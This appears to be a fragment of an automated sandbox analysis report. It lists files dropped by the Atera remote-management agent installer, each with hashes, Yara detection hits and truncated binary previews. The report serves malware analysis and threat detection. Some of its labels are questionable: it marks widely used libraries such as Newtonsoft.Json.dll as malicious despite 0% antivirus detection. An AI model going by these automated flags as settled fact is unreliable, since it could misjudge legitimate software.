                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):384894
                                                                                                                                                                                                                                        Entropy (8bit):7.999386459973609
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:v5tKfF+xcaAeibHkWm83Bb5HKVP92+imBs7H8dPkoFuvjQ2AhWy90sW1WTHHVwM9:htUF+xcsibbLLPUWOPkeuU2AsyjW15PE
                                                                                                                                                                                                                                        MD5:ABA4C6047CFEC27B6DB13E0F103F4BDB
                                                                                                                                                                                                                                        SHA1:916CB99BF2828286034BA6EF63891AABA24770EF
                                                                                                                                                                                                                                        SHA-256:B88271E1A2DF3FB14FA862922ECE74E403C6135DDE18BD58EE1F2003992F1D38
                                                                                                                                                                                                                                        SHA-512:6AD7D25781EDD630E2DD187A2523ACD3623ADA5AF5BBB822AEDE3643BA4A04E191B7E2B31DE78E362B9AC44A38A917B19C19FEBEA4EBC1E963F9F85BEA61DCA6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....u..Y..p.........=...AgentPackageAgentInformation/AgentPackageAgentInformation.exe....(.......8..........J..0....:........ggZ.......(;4jy.../...l...B...J....,..7;.2a..z.^.....d.....R.....B....U6-.j.D.}..7(..O...{<...^...R...$X.......g.u..C".............U...;...K...{C....k......MA0..$.X.JK@>Q.omT;.......6...%H..L...|.u"w...y.$.|].m.X/0.Ev.c$....X.;@...$^L*...g$...-.t...z>a..8g|O.K..b.?f?.......b........lsJ.*0..{zV1..U.*...=..C$..8a.....@(..s.r...k.....6.*...op.%....Z.!.7M3.C.>.aH.BS..?lB...SW...h.......hB...cT^uI1o..'x..eq)5@.[....$.]......1.LPx.....Q..{z..Ynm......OKr.S.S$z..4..a.D..R........2$...5B...;S..Ys...a....h.. .M..e.M...>...P,..Q.H.P.Yj.).I.y..ZC|S...'..U.]..r.".vA....n.>#...1.v..,Q.i.... ..u.p$.b.?...8<..v..o.*.Sf<r.Cx.C.'.#3.RL..kw.,..(Wz...L'..@..]K..z...E.....a....a...kG.P..#.D.....DKp.{;.\.*..R....Hp]...m<5.6.sjq...!.55.....|8...j...F...Lp.I...../.*.....Q..VR.0x..`.j*...j......%qc..2......WG...7_.d.V....7)@g..~.8M..=......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):178728
                                                                                                                                                                                                                                        Entropy (8bit):5.825238453021458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hEEm/xCr5UQFKa2kf9ZSf4aP8gCko0Dcm:hE7/xCwa2C9ZAt
                                                                                                                                                                                                                                        MD5:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        SHA1:C686501C1CDE18346B237C83450333E95570B844
                                                                                                                                                                                                                                        SHA-256:073E4CB181DF1D54B75277A52356A8D42573D61E878710BACDA8F2B0931D08A1
                                                                                                                                                                                                                                        SHA-512:C933C7C1FA3DEFE69CB1A86193A04533068C3695DCC14B235DA9E9342C5A81245060C72669069F2A06410DE7AEA1CABDFBC41B410353C597A731250E00CCBE93
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.Tg.........."...0.............".... ........@.. ..............................i.....`....................................O.......................((........................................................... ............... ..H............text...p.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H....... ...x.......,....................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o .....s!...%.o".......o#.....s$..........s%...%......io&...%o'.....o(.......o)...o).....(*...*..0..........r...p... .....r...p.(.....o......(.....o.......(+..........s......[o .....s!...%.o".......o,.......s-..........s%......i.l.....%......io........o)...o)...(.........o/...*..(0...*..{....*"..}....*..{....*"..}....*..{.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):546
                                                                                                                                                                                                                                        Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                        SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                        SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                        SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWYn:WB
                                                                                                                                                                                                                                        MD5:F647BC6B4E05B062BDE5A2F379B438BE
                                                                                                                                                                                                                                        SHA1:17FFC1B640A9AD0A8DC087CCA6C99478197EBAA0
                                                                                                                                                                                                                                        SHA-256:5F46695D90CFFB577A2961A23BE6DFAC09B39BFB2B9CBA13E5327407EE3557B6
                                                                                                                                                                                                                                        SHA-512:7EDB51CEFC77A67EF55093AA31D5C8AC899A6681D53AE6300132D851644CB15A0762511C61378C4C8C8C02A1B83A704E834C627B0998673085357A04599280AF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=38.3

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96808
                                                                                                                                                                                                                                        Entropy (8bit):6.1801112962149105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:sJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762OO:sQUm2H5KTfOLgxFJjE50vksVUfPvO1YO
                                                                                                                                                                                                                                        MD5:14FCB3F21FFC0FF3FA9F3C1CDEEFAE9D
                                                                                                                                                                                                                                        SHA1:6FD620BFC789F753E52E458A01E9522F3651E30B
                                                                                                                                                                                                                                        SHA-256:4C9AC64A4044D378D198A4371C7B346F891BF649EF21104440B8B4106AD0494C
                                                                                                                                                                                                                                        SHA-512:F3AE77B31184EDBA0AD2C97035AA96D2A28C77EBEF1CA7B4F26751DA606D2A0C9E0C636D51B44E1984BF6FEF3BECE596EA3CEDF3F901276CC61718AD3B20CFC7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................{.....`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704552
                                                                                                                                                                                                                                        Entropy (8bit):5.953924597885397
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:r9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3g:r8m657w6ZBLmkitKqBCjC0PDgM5w
                                                                                                                                                                                                                                        MD5:E337926D73F2A989AAAEE4C76709B750
                                                                                                                                                                                                                                        SHA1:11236A81C756E4137BC9400B62A93C4A2FA16BC1
                                                                                                                                                                                                                                        SHA-256:95E8D460402889DB8D3A87E4AAD117DCF829AB4FDCFB5B53589325E7DEDA7EB4
                                                                                                                                                                                                                                        SHA-512:ACDF3121F79BDC7ECE72D9539BFD3CD0436F406529EDC1D92ACB16A1EA212FFEEADD1839A38F013FE898F2B23B9CCC92C4A7DDBFFCD7B6F808388307072AAF7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ...................................`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\dynamicfieldscaching.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):4.654288288771306
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:hsShKY4MsShLP6SX9NfzyShaKf0OeZGShaKf0Od:P4qBX9Nf1md
                                                                                                                                                                                                                                        MD5:301EBD353A2ADCC7C6025D6DA284673A
                                                                                                                                                                                                                                        SHA1:E580B7D49010D87FAC16158D40C50DE08B73D805
                                                                                                                                                                                                                                        SHA-256:3F7E42E83A56915EB36638EAA51B926EF8BECB612656598F243EB856508329D9
                                                                                                                                                                                                                                        SHA-512:3D92F2C46E921B5937C9458323747CD89223AC1E700051DF7929709EB53C2F7A70986A0C35CD5951AA694AF814B24430F911599FB3AC258082DDF9693D812F51
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................TAgentPackageAgentInformation, Version=38.3.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]...............V.....H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\information.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.978864088188098
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:jTRydLFARSl:3Rs
                                                                                                                                                                                                                                        MD5:83FCD709FA2AE1C3FCA28EDD6B5DC3C9
                                                                                                                                                                                                                                        SHA1:4251FD79400EDA230C06B1CAD86B1E927ED9673B
                                                                                                                                                                                                                                        SHA-256:C123CB2A326E92A5ED179D8838C6E7136CC52335490814855C9BD868724EAFA2
                                                                                                                                                                                                                                        SHA-512:C8537DBD5A8928D190CC82AE25E5D04976618000C67B50C0EAB05B2362F64372195DC839BE77D8E294BDB515EF795F3F8E64BC28F30689327E1639F0A6DB3FFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.7B6B62F9AFCB8F80DDA3311D356DF7EE

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\update.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.677028119136097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:fc3Gh7UgzVchXn:f7NUgWn
                                                                                                                                                                                                                                        MD5:E49A5284D2F384905389D53944708C48
                                                                                                                                                                                                                                        SHA1:E455420E95EA0246B8B63A251B0E451ACD711B28
                                                                                                                                                                                                                                        SHA-256:33FD3B161AEC8867652C6B0707180ADC42C267EE9F66E33BF0CE70B55B4660B9
                                                                                                                                                                                                                                        SHA-512:E9EC60296F38F68EB6C6233094E50EF534CE44A91E6511097158D631673017F8FE316E1C11A494C29BD8BE6F94AAFBF9F4A9546E709694BD3CC98B12CD243FF4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.2E69DDAE9D0D04A8ED39EECA359A9772

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328916
                                                                                                                                                                                                                                        Entropy (8bit):7.999290842463468
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN/Hggh:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdv5
                                                                                                                                                                                                                                        MD5:D3901E62166E9C42864FE3062CB4D8D5
                                                                                                                                                                                                                                        SHA1:C9C19EEC0FA04514F2F8B20F075D8F31B78BAE70
                                                                                                                                                                                                                                        SHA-256:DBC0E52E6DE93A0567A61C7B1E86DAA51FBEF725A4A31EEF4C9BBFF86F43671C
                                                                                                                                                                                                                                        SHA-512:AE33E57759E573773B9BB79944B09251F0DC4E07CDB8F373EC06963ABFC1E6A6326DF7F3B5FECF90BD2B060E3CB5A48B913B745CC853AC32D2558A8651C76111
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....'gqX............/...AgentPackageHeartbeat/AgentPackageHeartbeat.exe....0l.......?........F0..6\.q.......<.......I.3. &.;.........O.;d.&.U....".' ..}P..u+0.`g.Z..Zq,...w.1./..UD....F.a...B=.....!.. .=... .#7A.Q..o.........+q.C5 . 1..Ud...R>n..Y.9}>z.....yE7.}!sn....p1(e.....}T#>2/..y*7.@.<..J..q......3.4....M..."/"..cS....9pT.dn.:c...&..,H.e.....r...X#...m...V..ZP......+.h.R. .8.......!7FNa.`.P;.......P~..U.x.K.D8.&.vQ!..xn..~cNG.2._L.},..........:.J...S.y..-J...K.z.H.....z.G.6....d.b.[..9......Q.r.T........#..+..b6<...p.}......!.5.&l.E..4.F8..Y...."/.b.....................(.......b..&.6...t..%.(A..X{....H4....[.....}.......n0.:.......s..wQ.&.J\|j.....7=b+.L.t.l.0.{G.Jb.Jy.U.kG.....p-...^..g.4..RA.R..........~..5t4_...Z...h..J..........t...C3....{K.h...F..W$...U....-55....Hi.......m...............x..........)...F.p....r,}}L...i:q.Y.O....`L......yY...N..J]....T..~_|.Bh..p.w%0.H.%D...p..RM`..e....TJk..(..\.%......4..N.<..^..k/_..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27696
                                                                                                                                                                                                                                        Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                        MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                        SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                        SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                        SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............"...0..8...........V... ...`....@.. ....................................`..................................V..O....`..P............D..0(...........U..8............................................ ............... ..H............text....6... ...8.................. ..`.rsrc...P....`.......:..............@..@.reloc...............B..............@..B.................V......H.......t-..x(......2.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.rW..p*.r...p*F.(....r...p( ...*.r...p*.r...p*..(....*.rM..p*.r...p

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):542
                                                                                                                                                                                                                                        Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                        SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
